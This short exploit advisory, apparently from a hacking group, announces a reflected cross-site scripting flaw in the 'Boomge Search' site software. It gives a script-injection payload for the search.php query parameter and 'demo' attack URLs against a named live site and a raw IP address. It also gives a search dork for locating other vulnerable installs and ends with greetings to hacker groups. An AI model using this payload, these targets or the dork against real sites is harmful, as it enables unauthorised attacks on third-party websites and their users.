Boomge Search suffers from a cross site scripting vulnerability.
a35f11eb7fa13041407764982b32b30e22043ad52ffb70b12e46c7d8232c6d54
#######################################################################################
# #
# Exploit Title : boomge Search Cross Site Scripting Vulnerabilitiy #
# #
# Author : Emperor-Team #
# #
# Discovered By : Am!r #
# #
# Home : http://Emperor-Team.Org #
# #
# Software Link : http://www.boom.ge #
# #
# Security Risk : High #
# #
# Version : All Version #
# #
# Tested on : GNU/Linux Ubuntu - Windows Server - win7 #
# #
# Dork : "boom ge" #
# #
#######################################################################################
# #
# Expl0iTs : #
# #
# [TarGeT]/search.php?query="><script>alert(/amir/)</script> #
# #
#######################################################################################
# #
# Demo: #
# #
# http://boom.ge/search.php?query=[Xss] #
# #
# http://91.208.144.132/~boomge/search.php?query=[Xss] #
# #
# #
#######################################################################################
# #
# Greats : Aria-Security.Com - Iranhack.Org - Zarbat.Org - datacoders.org - #
# #
# black-hg.org - Ashiyane.Org - And All Iranian Hackers #
# #
#######################################################################################